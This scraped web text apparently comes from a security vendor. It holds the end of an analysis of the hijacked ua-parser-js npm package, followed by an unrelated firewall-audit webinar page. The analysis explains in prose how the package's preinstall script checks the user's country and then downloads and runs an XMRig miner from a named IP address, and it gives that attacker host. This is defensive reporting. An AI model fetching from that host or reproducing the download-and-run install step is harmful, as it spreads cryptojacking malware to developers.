, (error, stdout, stderr) => { ... }); } The malicious preinstall.sh script first queries an XML file that will report the current user’s geo-location by visiting this URL . For example, for a user located in Australia, the returned content will be: [IP_ADDRESS] AU Australia ... Next, the script searches for the presence of the following country codes in the returned XML file: RU UA BY KZ That is, the script identifies if the affected user is located in Russia, Ukraine, Belarus, or Kazakhstan. Suppose the user is NOT located in any of these countries. In that case, the script will then fetch and execute malicious ELF binary jsextension from a server with IP address 159.148.186.228, located in Latvia. jsextension binary is an XMRig cryptominer with reasonably good coverage by other AV products. Conclusion The compromised ua-parser-js is a showcase of a typical supply chain attack. Last year, our research team found and reported a malicious package flatmap-stream in 1,482 Docker container images hosted in Docker Hub with a combined download count of 95M. The most significant contributor was the trojanized official container image of Eclipse. What’s fascinating in this case, however, is the effectiveness of the malicious code proliferation. It only takes one software developer to ignore a simple trick that reliably prevents these things from happening. The name of this trick is two-factor authentication (2FA). About the Country Codes Some people wonder why cybercriminals from Russia often avoid attacking victims outside of their country or other Russian-speaking countries. Some go as far as suggesting it’s for their own legal protection. The reality is way simpler, of course: “Не гадь там, где живешь” “Не сри там, где ешь” “Не плюй в колодец, пригодится воды напиться” Polite translation of all these sayings is: “One should not cause trouble in a place, group, or situation where one regularly finds oneself.” Schedule a demo Related Articles Q1 at AlgoSec: What innovations and milestones defined our start to 2026? AlgoSec Reviews Mar 19, 2023 · 2 min read 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call
- Firewalls Ablaze? Put Out Network Security Audit & Compliance Fires | AlgoSec
Webinars Horizon AppViz Ablaze? Ablaze? Put Out Network Security Audit & Compliance Fires The growing body of regulations and standards forces enterprises to put considerable emphasis on compliance verified by ad hoc and regular auditing of security policies and controls. While regulatory and internal audits entail a wide range of security checks, network firewalls are featured prominently as they are the first line of defense of the enterprise network. Typical networks might include tens or hundreds of firewalls from multiple vendors running thousands of rules. Auditing firewalls for compliance is becoming more complex and demanding all the time. Documentation of current rules and their evolution of changes is lacking Time and resources required to find, organize and inspect all the firewall rules to determine the level of compliance is exorbitant and growing It’s time to adopt auditing’s best practices to maintain continuous compliance. Join us in this webinar to discover the Firewall Audit Checklist, the 6 best practices that will ensure successful audits and full compliance. By adopting these best practices, security teams will significantly improve their network’s security posture and reduce the pain of ensuring compliance with regulations, industry standards and corporate policies. Tal Dayan AlgoSec security expert Relevant resources Firewall audit checklist for security policy rules review Firewall audit checklist for security policy rules review See Documentation AlgoSec Horizon AppViz - Application visibility for AlgoSec Firewall Analyzer See Documentation Firewall policy management Automate firewall rule changes See Documentation Choose a better way to manage your network Choose a better way to manage your network Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Continue




